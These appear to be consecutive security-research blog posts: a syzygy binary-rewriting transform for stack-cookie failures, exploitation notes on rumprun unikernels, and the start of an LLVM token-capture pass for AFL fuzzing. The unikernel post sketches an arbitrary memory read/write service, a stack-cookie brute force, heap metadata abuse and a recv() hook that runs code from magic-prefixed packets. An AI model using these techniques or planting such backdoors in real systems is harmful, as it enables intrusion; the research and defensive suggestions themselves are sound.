BlockGraph::BlockMap& blocks = block_graph->blocks_mutable();
for (auto& block : blocks) {
  std::string name(block.second.name());
  if (name == kReportGsFailure) {
    report_gsfailure = &block.second;
    break;
  }
}

if (report_gsfailure == nullptr) {
  LOG(ERROR) << "Could not find " << kReportGsFailure << ".";
  return false;
}

The transform tries to be careful by checking that the Block has only a single referrer, which should be the __security_check_cookie Block. If not, I gracefully exit and don't apply the transformation, as I am not sure what I am dealing with.

if (report_gsfailure->referrers().size() != 1) {
  // We bail out if we don't have a single referrer as the only
  // expected referrer is supposed to be __security_check_cookie.
  // If there is more than one, we would rather bail out than take
  // a chance at modifying the behavior of the PE image.
  LOG(ERROR) << "Only a single referrer to " << kReportGsFailure
              << " is expected.";
  return false;
}

At this point, I create a new Block that has only a single instruction, designed to trigger a fault every time; to do so I can even use the basic Intel assembler integrated in syzygy. After this, I place the new Block inside the .text section of the image (tracked by the BlockGraph as mentioned earlier).

BlockGraph::Section* section_text = block_graph->FindOrAddSection(
    pe::kCodeSectionName, pe::kCodeCharacteristics);

// All of the below is needed to build the instrumentation via the assembler.
BasicBlockSubGraph bbsg;
BasicBlockSubGraph::BlockDescription* block_desc = bbsg.AddBlockDescription(
    kSyzygyReportGsFailure, nullptr, BlockGraph::CODE_BLOCK,
    section_text->id(), 1, 0);

BasicCodeBlock* bb = bbsg.AddBasicCodeBlock(kSyzygyReportGsFailure);
block_desc->basic_block_order.push_back(bb);
BasicBlockAssembler assm(bb->instructions().begin(), &bb->instructions());
assm.mov(Operand(Displacement(kInvalidUserAddress)), assm::eax);

// Condense into a block.
BlockBuilder block_builder(block_graph);
if (!block_builder.Merge(&bbsg)) {
  LOG(ERROR) << "Failed to build " << kSyzygyReportGsFailure << " block.";
  return false;
}

DCHECK_EQ(1u, block_builder.new_blocks().size());

Finally, I update all the referrers to point to our new Block, and remove the __report_gsfailure Block as it is effectively now dead-code:

// Transfer the referrers to the new block, and delete the old one.
BlockGraph::Block* syzygy_report_gsfailure =
    block_builder.new_blocks().front();
report_gsfailure->TransferReferrers(
    0, syzygy_report_gsfailure,
    BlockGraph::Block::kTransferInternalReferences);

report_gsfailure->RemoveAllReferences();
if (!block_graph->RemoveBlock(report_gsfailure)) {
  LOG(ERROR) << "Removing " << kReportGsFailure << " failed.";
  return false;
}

Here is what it looks like after our transformation:

; void __fastcall __security_check_cookie(unsigned int cookie)
@__security_check_cookie@4 proc near
cookie = ecx
                cmp     cookie, ___security_cookie
                repne jnz short failure
                repne retn
failure:
                repne jmp loc_426EE6 <- our new __report_gsfailure block

loc_426EE6:
                mov     ds:0DEADBEEFh, eax

One does not simply binary rewrite

It may look like an easy problem without any pitfalls, but before settling on the solution above I actually first tried to rewrite the __security_check_cookie function itself. I thought it would be cleaner, and it was also very easy to do with syzygy: I had to create a new Block, transfer the referrers to my new block and... that was it!

Now it was working fine on a bunch of targets on various OSs: Windows 7, Windows 8, Windows 8.1, Windows 10. Until I started noticing some instrumented binaries that would not even execute; the loader would not load the binary and I was left with a message box telling me the binary could not be loaded in memory: STATUS_INVALID_IMAGE_FORMAT or 0xc000007b. This was pretty mysterious at first, as the instrumented binary would run fine on Windows 7 but not on Windows 10. The binary also looked instrumented exactly the way I wanted it to be: all the callers of __security_check_cookie were now calling into my new function and nothing seemed off.

At this point, the only thing I knew was that the PE loader was not happy with the file; so that is where I started my investigation. After hours of back and forth between ntdll and the kernel, I found that the CFG [LoadConfigDirectory.GuardCFFunctionTable](https://msdn.microsoft.com/en-us/library/windows/desktop/ms680547(v=vs.85).aspx) table (where the compiler puts all the valid indirect-call targets) embedded in binaries is expected to be ordered from low to high RVAs. I also realized that one of the referrers of my block was this CFG table, which would get fixed-up with the RVA of wherever the new block was placed by the binary rewriting framework. And of course, in some cases this RVA would end up being greater than the RVA right after it in the table... upsetting the loader.

[Image: security_cookie_GuardCFFunctionTable.png - the GuardCFFunctionTable entries]
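
A quick way to convince yourself of the ordering requirement is to dump the table and check that consecutive RVAs are sorted; here is a hedged sketch (it assumes plain 4-byte entries, whereas GuardFlags can specify extra metadata bytes per entry):

#include <cstddef>
#include <cstdint>
#include <cstdio>

// Sketch: given a pointer to the GuardCFFunctionTable and its entry count
// (from IMAGE_LOAD_CONFIG_DIRECTORY32's GuardCFFunctionTable and
// GuardCFFunctionCount fields), verify the RVAs are ordered low to high.
bool GuardTableIsSorted(const uint32_t* rvas, size_t count) {
  for (size_t i = 1; i < count; ++i) {
    if (rvas[i - 1] > rvas[i]) {
      printf("entry %zu (%08x) > entry %zu (%08x)\n", i - 1,
             (unsigned)rvas[i - 1], i, (unsigned)rvas[i]);
      return false;  // This is what upsets the Windows 10 loader.
    }
  }
  return true;
}
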
All of this to say that even though the framework is robust, binary rewriting can be hard when instrumenting unknown targets that may make assumptions about the way their functions look, or about how some parts of the code / data are laid out, etc. So keep that in mind while playing :).

Last words

In this post I have introduced the syzygy framework, presented some of its strengths as well as its limitations, and illustrated what you can do with it through two simple examples. I am hoping to write a second post where I can talk a bit more about two other transforms I have designed to build the static instrumentation mode of WinAFL, and how all the pieces work together. I would also like to see if I can't cook up some obfuscation or something of the sort.

As usual you can find the code on my GitHub here: stuffz/syzygy.

If you can't wait for the next post, you can already have a look at add_implicit_tls_transform.cc and afl_transform.cc.

Last but not least, special shout-outs to my proofreader yrp.

happy unikernels

By: yrp
22 December 2016 at 02:59

Intro

Below is a collection of notes regarding unikernels. I had originally prepared this stuff to submit to EkoParty's CFP, but ended up not wanting to devote time to stabilizing PHP7's heap structures and I lost interest in the rest of the project before it was complete. However, there are still some cool takeaways I figured I could write down. Maybe they'll come in handy? If so, please let me know.

Unikernels are a continuation of turning everything into a container or VM. Basically, as many VMs currently just run one userland application, the idea is that we can simplify our entire software stack by removing the userland/kernelland barrier and essentially compiling our usermode process into the kernel. This is, in the implementation I looked at, done with a NetBSD kernel and a variety of either native or lightly-patched POSIX applications (bonus: there is significant lag time between upstream fixes and rump package fixes, just like every other containerized solution).

While I don’t necessarily think that conceptually unikernels are a good idea (attack surface reduction vs mitigation removal), I do think people will start more widely deploying them shortly and I was curious what memory corruption exploitation would look like inside of them, and more generally what your payload options are like.

All of the following is based off of two unikernel programs, nginx and php5 and only makes use of public vulnerabilities. I am happy to provide all referenced code (in varying states of incompleteness), on request.

Basic ‘Hello World’ Example

To get a basic understanding of a unikernel, we’ll walk through a simple ‘Hello World’ example. First, you’ll need to clone and build (./build-rr.sh) the rumprun toolchain. This will set you up with the various utilities you'll need.

Compiling and ‘Baking’

In a rumpkernel application, we have a standard POSIX environment, minus anything involving multiple processes. Standard memory, file system, and networking calls all work as expected. The only differences lie in the multi-process related calls such as fork(), signal(), pthread_create(), etc. The scope of these differences can be found in The Design and Implementation of the Anykernel and Rump Kernels [pdf].

From a super basic, standard ‘hello world’ program:

#include <stdio.h>
int main(void)
{
    printf("Hello\n");
    return 0;
}

After building rumprun we should have a new compiler, x86_64-rumprun-netbsd-gcc. This is a cross compiler targeting the rumpkernel platform. We can compile as normal x86_64-rumprun-netbsd-gcc hello.c -o hello-rump and in fact the output is an ELF: hello-rump: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped. However, as we obviously cannot directly boot an ELF we must manipulate the executable ('baking' in rumpkernel terms).

Rump kernels provide a rumprun-bake shell script. This script takes an ELF from compiling with the rumprun toolchain and converts it into a bootable image which we can then give to qemu or xen. Continuing in our example: rumprun-bake hw_generic hello.bin hello-rump, where the hw_generic just indicates we are targeting qemu.

Booting and Debugging

At this point assuming you have qemu installed, booting your new image should be as easy as rumprun qemu -g "-curses" -i hello.bin. If everything went according to plan, you should see something like:

Hello

Because this is just qemu at this point, if you need to debug you can easily attach via qemu’s system debugger. Additionally, a nice side effect of this toolchain is very easy debugging — you can essentially debug most of your problems on the native architecture, then just switch compilers to build a bootable image. Also, because the boot time is so much faster, debugging and fixing problems is vastly sped up.
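
For example, since -g just forwards extra arguments to qemu, you can use qemu's standard gdb stub flags (-s to listen on :1234, -S to freeze the CPU at startup) and attach from another terminal; exact symbol handling may need tweaking, since the pre-bake ELF is relocatable:

rumprun qemu -g "-curses -s -S" -i hello.bin

# in another terminal
gdb hello-rump -ex "target remote localhost:1234" -ex "continue"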

If you have further questions, or would like more detail, the Rumpkernel Wiki has some very good documents explaining the various components and options.

Peek/Poke Tool

Initially, to develop some familiarity with the code, I wrote a simple peek/poke primitive process. The VM would boot and expose a TCP socket that would allow clients to read or write arbitrary memory, as well as wrappers around malloc() and free() to play with the heap state. Most of the knowledge here is derived from this test code, poking at it with a debugger, and reading the rump kernel source.
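
The idea is simple enough that a minimal sketch conveys it; the wire format and names below are entirely made up for illustration:

// Sketch of a peek/poke service: read {op, addr, len} commands off an
// already-accepted TCP socket, then read or write raw memory. The wire
// format is invented; error handling is omitted.
#include <stdint.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

struct cmd { uint8_t op; uint64_t addr; uint64_t len; } __attribute__((packed));

static void serve(int client) {
  struct cmd c;
  while (read(client, &c, sizeof(c)) == sizeof(c)) {
    if (c.op == 0) {        // peek: send back len bytes from addr
      write(client, (void *)c.addr, c.len);
    } else if (c.op == 1) { // poke: overwrite len bytes at addr
      uint8_t buf[256];
      if (c.len <= sizeof(buf) && read(client, buf, c.len) == (ssize_t)c.len)
        memcpy((void *)c.addr, buf, c.len);
    }
  }
}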

Memory Protections

One of the benefits of unikernels is you can prune components you might not need. For example, if your unikernel application does not touch the filesystem, that code can be removed from your resulting VM. One interesting consequence of this involves only running one process — because there is only one process running on the VM, there is no need for a virtual memory system to separate address spaces by process.

Right now this means that all memory is read-write-execute. I'm not sure if it's possible to configure the MMU in a hypervisor to enforce memory protections without enabling virtual memory, as most of the virtual memory code I've looked at has been related to process separation with page tables, etc. In any case, it's currently pretty trivial to introduce new code into the system and there shouldn't be much need to resort to ROP.

nginx

Nginx was the first target I looked at; I figured I could dig up the stack smash from 2013 (CVE-2013-2028) and use that as a baseline exploit to see what was possible. This ultimately failed, but exposed some interesting things along the way.

Reason Why This Doesn’t Work

CVE-2013-2028 is a stack buffer overflow in the nginx handler for chunked requests. I thought this would be a good test as the user controls much of the data on the stack, however, various attempts to trigger the overflow failed. Running the VM in a debugger you could see the bug was not triggered despite the size value being large enough. In fact, the syscall returned an error.

It turns out, however, that NetBSD has code to protect against this inside the kernel:

do_sys_recvmsg_so(struct lwp *l, int s, struct socket *so, struct msghdr *mp,
        struct mbuf **from, struct mbuf **control, register_t *retsize) {
// …
        if (tiov->iov_len > SSIZE_MAX || auio.uio_resid > SSIZE_MAX) {
            error = EINVAL;
            goto out;
        }
// …

iov_len is our recv() size parameter, so this bug is dead in the water. As an aside, this also made me wonder how Linux applications would respond if you passed a size greater than LONG_MAX into recv() and it succeeded…

Something Interesting

Traditionally when exploiting this bug one has to worry about stack cookies. Nginx has a worker pool of processes forked from the main process. In the event of a crash, a new process will be forked from the parent, meaning that the stack cookie will remain constant across subsequent connections. This allows you to break it down into four 1-byte brute forces as opposed to one 4-byte brute force, meaning it can be done in a maximum of 1024 connections. However, inside the unikernel, there is only one process — if the process crashes the entire VM must be restarted, and because the only process is the kernel, the stack cookie should (in theory) be regenerated. Looking at the disassembled nginx code, you can see the stack cookie checks in all of the relevant functions.
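
As a refresher, the classic fork-server brute force goes byte by byte (none of which applies inside the unikernel, for the reasons above); survives() below is a hypothetical oracle that sends an overflow clobbering only the given cookie prefix and reports whether the worker crashed:

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

// Hypothetical oracle: overflow up to and including the first 'len' cookie
// bytes with 'guess' and report whether the worker survived.
bool survives(const uint8_t *guess, size_t len);

// Recover a 4-byte cookie in at most 4 * 256 = 1024 connections, relying on
// the cookie staying constant across forked workers.
static void brute_cookie(uint8_t cookie[4]) {
  for (size_t i = 0; i < 4; ++i) {
    for (int b = 0; b <= 0xff; ++b) {
      cookie[i] = (uint8_t)b;
      if (survives(cookie, i + 1))
        break; // byte i recovered, move on to the next one
    }
  }
}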

In practice, the point is moot because the stack cookies are always zero. The compiler creates and checks the cookies; it just never populates fs:0x28 (the location of the cookie value), so the cookie is always a constant value, and assuming you can write null bytes this should pose no problem.

ASLR

I was curious if unikernels would implement some form of ASLR, as during the build process they get compiled to an ELF (which is quite nice for analysis!) which might make position independent code easier to deal with. They don't: all images are loaded at 0x100000. There is however "nature's ASLR": as these images aren't distributed in binary form, everyone must compile their own, and they will vary slightly depending on compiler version, software version, etc. However, even this constraint gets easier to deal with. If you look at the format of the loaded images, they look something like this:

0x100000: <unikernel init code>
…
0x110410: <application code starts>

This means across any unikernel application you’ll have approximately 0x10000 bytes of fixed value, fixed location executable memory. If you find an exploitable bug it should be possible to construct a payload entirely from the code in this section. This payload could be used to leak the application code, install persistence, whatever.

PHP

Once nginx was off the table, I needed another application that had a rumpkernel package and a history of exploitable bugs. The PHP interpreter fits the bill. I ended up using Sean Heelan's PHP bug #70068, because of the trigger provided in the bug description and the detailed explanation of the bug. Rather than try to poorly recap Sean's work, I'd encourage you to just read the initial report if you're curious about the bug.

In retrospect, I took a poor exploitation path for this bug. Because the heap slabs have no ASLR, you can fairly confidently predict mapped addresses inside the PHP interpreter. Furthermore, by controlling the size of the payload, you can determine which bucket it will fall into and pick a lesser used bucket for more stability. This allows you to be lazy, and hard code payload addresses, leading to easy exploitation. This works very well -- I was basically able to take Sean's trigger, slap some addresses and a payload into it, and get code exec out of it. However, the downsides to this approach quickly became apparent. When trying to return from my payload and leave the interpreter in a sane state (as in, running) I realized that I would need to actually understand the PHP heap to repair it. I started this process by examining the rump heap (see below), but got bored when I ended up in the PHP heap.

Persistence

This was the portion I wanted to finish for EkoParty, and it didn't get done. In theory, as all memory is read-write-execute, it should be pretty trivial to just patch recv() or something to inspect the data received, and if it matches some constant, execute the rest of the packet. This is strictly in memory; anything touching disk will be application specific.
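
A minimal sketch of that idea, assuming you have already redirected recv() to your own code; the magic bytes and names are invented:

#include <string.h>
#include <sys/types.h>

// real_recv is a saved pointer to the original recv. Any packet starting
// with kMagic gets its remainder executed in place -- only possible because
// all memory is read-write-execute.
static ssize_t (*real_recv)(int, void *, size_t, int);
static const unsigned char kMagic[8] = {0xde, 0xad, 0xbe, 0xef,
                                        0xfe, 0xed, 0xfa, 0xce};

ssize_t hooked_recv(int s, void *buf, size_t len, int flags) {
  ssize_t n = real_recv(s, buf, len, flags);
  if (n > (ssize_t)sizeof(kMagic) && memcmp(buf, kMagic, sizeof(kMagic)) == 0)
    ((void (*)(void))((unsigned char *)buf + sizeof(kMagic)))();
  return n;
}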

Assuming your payload is stable, you should be able to install an in-memory backdoor which will persist for the runtime of that session (and be deleted on poweroff). While in many configurations there is no writable persistent storage that survives reboots, this is not true for all unikernels (e.g. mysql). In those cases it might be possible to persist across power cycles, but this will be application specific.

One final, and hopefully obvious note: one of the largest differences in exploitation of unikernels is the lack of multiple processes. Exploits frequently use the existence of multiple processes to avoid cleaning up application state after a payload is run. In a unikernel, your payload must repair application state or crash the VM. In this way it is much more similar to a kernel exploit.

Heap Notes

The unikernel heap is quite nice from an exploitation perspective. It's a slab-style allocator with in-line metadata on every block. Specifically, the metadata contains the ‘bucket’ the allocation belongs to (and thus the freelist the block should be released to). This means a relative overwrite plus free()ing into a smaller bucket should allow for fairly fine grained control of contents. Additionally the heap is LIFO, allowing for standard heap massaging.
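
Schematically - this is an illustration, not the actual rump allocator structures - the attack on the in-line metadata looks like this:

// Illustration only -- not the real rump layout. Each block is preceded by
// in-line metadata recording its bucket (i.e. which freelist it returns to).
struct chunk_hdr {
  unsigned bucket; // freelist index used by free()
  /* ... allocator bookkeeping ... */
};

// A linear overflow out of chunk A that reaches chunk B's header can rewrite
// B's bucket to a smaller one. When B is freed it lands on the wrong
// freelist, and a later allocation of the smaller size hands back memory
// overlapping B -- fairly fine grained control of its contents.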

Also, while kinda untested, I believe rumpkernel applications are compiled without QUEUEDEBUG defined. This is relevant as the sanity checks on unlink operations ("safe unlink") require it to be defined. This means that in some cases, if freelists themselves can be overflowed and then removed, you can get a write-what-where. However, I think this is fairly unlikely in practice, and with the lack of memory protections elsewhere, I'd be surprised if it would currently be useful.

You can find most of the relevant heap source here

Symbol Resolution

Rumpkernels helpfully include an entire syscall table under the mysys symbol. When rumpkernel images get loaded, the ELF header gets stripped, but the rest of the memory is loaded contiguously:

gef➤  info file
Symbols from "/home/x/rumprun-packages/php5/bin/php.bin".
Remote serial target in gdb-specific protocol:
Debugging a target over a serial line.
        While running this, GDB does not access memory from...
Local exec file:
        `/home/x/rumprun-packages/php5/bin/php.bin', file type elf64-x86-64.
        Entry point: 0x104000
        0x0000000000100000 - 0x0000000000101020 is .bootstrap
        0x0000000000102000 - 0x00000000008df31c is .text
        0x00000000008df31c - 0x00000000008df321 is .init
        0x00000000008df340 - 0x0000000000bba9f0 is .rodata
        0x0000000000bba9f0 - 0x0000000000cfbcd0 is .eh_frame
        0x0000000000cfbcd0 - 0x0000000000cfbd28 is link_set_sysctl_funcs
        0x0000000000cfbd28 - 0x0000000000cfbd50 is link_set_bufq_strats
        0x0000000000cfbd50 - 0x0000000000cfbde0 is link_set_modules
        0x0000000000cfbde0 - 0x0000000000cfbf18 is link_set_rump_components
        0x0000000000cfbf18 - 0x0000000000cfbf60 is link_set_domains
        0x0000000000cfbf60 - 0x0000000000cfbf88 is link_set_evcnts
        0x0000000000cfbf88 - 0x0000000000cfbf90 is link_set_dkwedge_methods
        0x0000000000cfbf90 - 0x0000000000cfbfd0 is link_set_prop_linkpools
        0x0000000000cfbfd0 - 0x0000000000cfbfe0 is .initfini
        0x0000000000cfc000 - 0x0000000000d426cc is .data
        0x0000000000d426d0 - 0x0000000000d426d8 is .got
        0x0000000000d426d8 - 0x0000000000d426f0 is .got.plt
        0x0000000000d426f0 - 0x0000000000d42710 is .tbss
        0x0000000000d42700 - 0x0000000000e57320 is .bss

This means you should be able to just run a simple linear scan looking for the mysys table. A basic heuristic should be fine: an 8-byte syscall number followed by an 8-byte address. In the PHP5 interpreter, this table has 67 entries, giving it a big, fat footprint:

gef➤  x/6g mysys
0xaeea60 <mysys>:       0x0000000000000003      0x000000000080b790 -- <sys_read>
0xaeea70 <mysys+16>:    0x0000000000000004      0x000000000080b9d0 -- <sys_write>
0xaeea80 <mysys+32>:    0x0000000000000006      0x000000000080c8e0 -- <sys_close>
...

There is probably a chain of pointers in the initial constant 0x10410 bytes you could also follow, but this approach should work fine.
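
A hedged sketch of such a scan, using the first three syscall numbers visible in the dump above (3, 4, 6) as the signature; the pointer-sanity bounds are rough and everything else is illustrative:

#include <stddef.h>
#include <stdint.h>

// The table is an array of {syscall number, handler} pairs, both 8 bytes.
struct sysent { uint64_t num; uint64_t fn; };

// Scan [start, end) for the mysys table by looking for the known prefix
// 3 (read), 4 (write), 6 (close) with a plausible .text pointer as handler.
static const struct sysent *find_mysys(const uint8_t *start,
                                       const uint8_t *end) {
  for (const uint8_t *p = start; p + 3 * sizeof(struct sysent) <= end; p += 8) {
    const struct sysent *s = (const struct sysent *)p;
    if (s[0].num == 3 && s[1].num == 4 && s[2].num == 6 &&
        s[0].fn > 0x100000 && s[0].fn < 0x1000000) // rough .text bounds
      return s;
  }
  return NULL;
}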

Hypervisor fuzzing

After playing with these for a while, I had another idea: rather than using unikernels to host userland services, I think there is a really cool opportunity to write a hypervisor fuzzer in a unikernel. Consider:

  • You have all the benefits of a POSIX userland, only you're in ring0.
  • You don't need to export your data to userland to get easy and familiar IO functions.
  • Unikernels boot really, really fast - as in under 1 second - which should allow for pretty quick state clearing.

This is definitely an area of interesting future work I’d like to come back to.

Final Suggestions

If you develop unikernels:

  • Populate the randomness for stack cookies.
  • Load at a random location for some semblance of ASLR.
  • Is there a way you can enforce memory permissions? Some form of NX would go a long way.
  • If you can’t, some control flow integrity stuff might be a good idea? Haven’t really thought this through or tried it.
  • Take as many lessons from grsec as possible.

If you’re exploiting unikernels:

  • Have fun.

If you’re exploiting hypervisors:

  • Unikernels might provide a cool platform to easily play in ring0.

Thanks

For feedback, bugs used, or editing @seanhn, @hugospns, @0vercl0k, @darkarnium, other quite helpful anonymous types.

Token capture via an llvm-based analysis pass

Introduction

About three years ago, the LLVM framework started to pique my interest for a lot of different reasons. This collection of industrial strength compiler technology, as Lattner said in 2008, was designed in a very modular way. It also looked like it had a lot of interesting features that could be used in a lot of different domains: code optimization (think deobfuscation), (architecture independent) code obfuscation, static code instrumentation (think sanitizers), static analysis, runtime software exploitation mitigations (think CFI, SafeStack), powering a fuzzing framework (think libFuzzer)... you name it.

A lot of the power of this giant library comes from the fact that it operates in mainly three stages, and you are free to hook your code into any of them: front-end, mid-end, back-end. Other strengths include: the high number of back-ends, the documentation, the C/C++ APIs, the community, and the ease of use compared to gcc (see below, from kcc's presentation).

[Image: GCC from a newcomer's perspective]

The front-end takes source code as input and generates LLVM IL code, the middle part operates on LLVM IL, and the last one receives LLVM IL in order to output assembly code and/or an executable file.

[Image: Major components in a three phase compiler]

In this post we will walk through a simple LLVM pass that does neither optimization nor obfuscation, but acts as a token finder for fuzzing purposes.

Background

Source of inspiration

If you haven't heard of lcamtuf's new coverage-guided fuzzer, it's most likely because you have lived in a cave for the past year or two, as it has been mentioned basically everywhere (now on this blog too!). The sources, the documentation and the afl-users group are really awesome resources if you'd like to know a little bit more and follow its development.

What you have to know for this post, though, is that the fuzzer generates test cases and will pick and keep the interesting ones based on the code-coverage they exercise. You end up with a set of test cases covering different parts of the code, and can spend more time hammering and mutating a small number of files instead of a zillion. It is also packed with clever hacks that make it one of the most used and easiest-to-use fuzzers today (don't ask me for proof to back this claim).

In order to measure the code coverage, the first version of AFL would hook into the compiler toolchain and instrument basic blocks in the .S files generated by gcc. The instrumentation flips a bit in a bitmap as a way of saying "I've executed this part of the code". This tiny per-block static instrumentation (as opposed to DBI-based approaches) makes it hella fast, and can actually be used while fuzzing without too much overhead. After a little while, an LLVM-based version was designed (by László Szekeres and lcamtuf) in order to be less hacky, architecture independent (a bonus you get for free when writing a pass), and very elegant (no more reading/modifying raw .S files). The way this is implemented is by hooking into the mid-end in order to statically add the extra instrumentation afl-fuzz needs for its code-coverage feedback. This is now known as afl-clang-fast.
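
As a reminder of what that instrumentation amounts to, here is a sketch paraphrased from AFL's technical_details.txt; names and map size are illustrative, and the real code bumps a byte counter per edge rather than literally flipping a bit:

#include <stdint.h>

#define MAP_SIZE (1 << 16)
static uint8_t  shared_mem[MAP_SIZE]; /* coverage map shared with afl-fuzz */
static uint16_t prev_location;        /* id of the previously executed block */

/* Each instrumented basic block executes the equivalent of this, where
   cur_location is a compile-time random constant unique to the block. */
static inline void afl_log_edge(uint16_t cur_location) {
    shared_mem[cur_location ^ prev_location]++;
    prev_location = cur_location >> 1;
}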

A little later, some discussions on the Google group led the readers to believe that knowing the "magics" used by a library would make the fuzzing more efficient. If I know all the magics and have a way to detect where they are located in a test case, then I can use them instead of bit-flipping and hope it leads to "better" fuzzing. Such a list of "magics" is called a dictionary, and what I just called "magics" are "tokens". You can provide such a dictionary (a list of tokens) to afl via the -x option. In order to ease and automate the process of generating a dictionary file, lcamtuf developed a runtime solution based on LD_PRELOAD that instruments calls to memory-compare-like routines: strcmp, memcmp, etc. If one of the arguments comes from a read-only section, then it is most likely a token and a good candidate for the dictionary. This is called afl-tokencap.
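
For reference, feeding such a dictionary to afl-fuzz is just a matter of passing the file on the command line (paths here are placeholders):

$ afl-fuzz -i testcases -o findings -x png.dict -- ./target @@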

afl-llvm-tokencap

What if instead of relying on a runtime solution that requires you to:

  • Have built a complete enough corpus to exercise the code that will expose the tokens,
  • Recompile your target with a set of extra options that tell your compiler not to use the built-in versions of strcmp/strncmp/etc,
  • Run every test case through the new binary with the libtokencap library LD_PRELOAD'd.

...we build the dictionary at compile time instead. The idea is to have another pass hook into the build process, look for tokens at compile time, and build a dictionary ready to use for your first fuzzing run. Thanks to LLVM, this can be written in less than 400 lines of code. It is also easy to read, easy to write, and architecture independent, as it runs before the back-end.

This is the problem I will walk you through in this post, AKA yet another example of an LLVM pass. Here we are anyway; an occasion to get back to blogging, one might even say!

Before diving in, here what we actually want the pass to do:

  • Walk through every instruction compiled and find all the function calls,
  • When the call target is one of the functions of interest (strcmp, memcmp, etc), extract the arguments,
  • If one of the arguments is a hard-coded string, save it as a token in the dictionary being built at compile time.

afl-llvm-tokencap-pass.so.cc

In case you are already very familiar with LLVM and its pass mechanism, here is afl-llvm-tokencap-pass.so.cc and the afl.patch - it is about 300 lines of C++ and is pretty straightforward to understand.

Now, for all the others who would like a walk-through of the source code, let's do it.

AFLTokenCap class

The most important part of this file is the AFLTokenCap class, which walks through the LLVM IR instructions looking for tokens. LLVM gives you the possibility to work at different granularity levels when writing a pass (from more granular to less granular): BasicBlockPass, FunctionPass, ModulePass, etc. Note that those are not the only ones; there are quite a few others that work slightly differently: MachineFunctionPass, RegionPass, LoopPass, etc.

When you are writing a pass, you write a class that subclasses a *Pass parent class. Doing that means you are expected to implement different virtual methods that will be called under specific circumstances - but basically you have three functions: doInitialization, runOn* and doFinalization. The first and the last are rarely used, but they give you a way to execute code before any basic block has been visited, or after they all have. The runOn* function is the important one though: this is the function that gets called with an LLVM object you are free to walk through (Analysis passes, according to the LLVM nomenclature) or modify (Transformation passes). As I said above, the LLVM objects are basically Module/Function/BasicBlock instances. In case it is not obvious: a Module (a .c file) is made of Functions, a Function is made of BasicBlocks, and a BasicBlock is a set of Instructions. I also suggest you take a look at the HelloWorld pass from the LLVM wiki; it should give you another simple example to wrap your head around the concept of a pass.
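
To make this concrete, here is a minimal skeleton of such a pass, written against the legacy pass manager of the LLVM versions afl targeted at the time (BasicBlockPass has since been removed from LLVM); the class name and pass description are mine:

#include "llvm/Pass.h"
#include "llvm/IR/BasicBlock.h"
#include "llvm/IR/Function.h"

using namespace llvm;

namespace {

struct TokenCapSkeleton : public BasicBlockPass {
  static char ID;
  TokenCapSkeleton() : BasicBlockPass(ID) {}

  // Called once per function, before its basic blocks are visited.
  bool doInitialization(Function &F) override { return false; }

  // Called for every basic block; we return false because nothing is modified.
  bool runOnBasicBlock(BasicBlock &B) override { return false; }

  // Called once per function, after all its basic blocks have been visited.
  bool doFinalization(Function &F) override { return false; }
};

}

char TokenCapSkeleton::ID = 0;
static RegisterPass<TokenCapSkeleton> X("tokencap-skeleton",
                                        "minimal analysis pass skeleton");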

For today's use case I have chosen to subclass BasicBlockPass, because our analysis doesn't need anything more than a BasicBlock to work on. This is the case because we are mainly interested in capturing certain arguments passed to certain function calls. Here is what a function call looks like in the LLVM IR world:

%retval = call i32 @test(i32 %argc)
call i32 (i8*, ...)* @printf(i8* %msg, i32 12, i8 42)   ; yields i32
%X = tail call i32 @foo()                               ; yields i32
%Y = tail call fastcc i32 @foo()                        ; yields i32
call void %foo(i8 97 signext)

%struct.A = type { i32, i8 }
%r = call %struct.A @foo()             ; yields { i32, i8 }
%gr = extractvalue %struct.A %r, 0     ; yields i32
%gr1 = extractvalue %struct.A %r, 1    ; yields i8
%Z = call void @foo() noreturn         ; indicates that %foo never returns normally
%ZZ = call zeroext i32 @bar()          ; Return value is %zero extended

Every time AFLTokenCap::runOnBasicBlock is called, the LLVM mid-end calls into our analysis pass (either statically linked into clang/opt, or dynamically loaded) with a BasicBlock passed by reference. From there, we can iterate through the set of instructions contained in the basic block and find the call instructions. Every instruction subclasses the top-level llvm::Instruction class - in order to filter, you can use the dyn_cast<T> template function, which works like the dynamic_cast<T> operator but does not rely on RTTI (and is more efficient - according to the LLVM coding standards). Used in conjunction with a range-based for loop on the BasicBlock object, you can iterate through all the instructions you want.

bool AFLTokenCap::runOnBasicBlock(BasicBlock &B) {

  for(auto &I_ : B) {

    /* Handle calls to functions of interest */
    if(CallInst *I = dyn_cast<CallInst>(&I_)) {

      // [...]
    }
  }

  /* Analysis only: we never modify the basic block */
  return false;
}

Once we have found an llvm::CallInst instance, we need to check that the callee is one of the functions of interest (strcmp, memcmp, and friends) and, if it is, extract its arguments.

Not sure if you have noticed yet, but not all the objects we are playing with are subclasses of llvm::Instruction. You also have to deal with llvm::Value, which is an even more top-level class (llvm::Instruction is a child of llvm::Value). llvm::Value is also used to represent constants: think of hard-coded strings, integers, etc.

Detecting hard-coded strings

In order to detect hard-coded strings in the arguments passed to function calls, I decided to filter for llvm::ConstantExpr instances. As its name suggests, this class handles "a constant value that is initialized with an expression using other constant values".

The end goal is to find llvm::ConstantDataArrays and to retrieve their raw values - those will be the hard-coded strings we are looking for.
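
Here is a minimal sketch of that digging, assuming Arg is an llvm::Value* obtained from CallInst::getArgOperand() and dump_string_token is a hypothetical helper writing tokens to the dictionary:

if(ConstantExpr *CE = dyn_cast<ConstantExpr>(Arg)) {
  if(CE->getOpcode() == Instruction::GetElementPtr) {
    /* Operand 0 of the GEP expression is the global holding the literal */
    if(GlobalVariable *GV = dyn_cast<GlobalVariable>(CE->getOperand(0))) {
      if(GV->hasInitializer()) {
        if(ConstantDataArray *CDA =
               dyn_cast<ConstantDataArray>(GV->getInitializer())) {
          if(CDA->isCString())
            dump_string_token(CDA->getAsCString()); /* hypothetical helper */
        }
      }
    }
  }
}

When run on libpng, for instance, the pass surfaces tokens like the following: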

/home/over/workz/afl-2.35b/afl-clang-fast -c -W -Wall -O3 -funroll-loops   -fPIC -o png.pic.o png.c
[...]
afl-llvm-tokencap-pass 2.35b by <[email protected]>
[...]
[+] Call to memcmp with constant "\x00\x00\xf6\xd6\x00\x01\x00\x00\x00\x00\xd3" found in png.c/png_icc_check_header

At this point, the pass basically does what the token capture library is able to do.

Harvesting integer immediates

After playing around with it on libpng, though, I quickly wondered why the pass would not extract all the constants I could find in one of the dictionaries already generated and shipped with afl:

// png.dict
section_IDAT="IDAT"
section_IEND="IEND"
section_IHDR="IHDR"
section_PLTE="PLTE"
section_bKGD="bKGD"
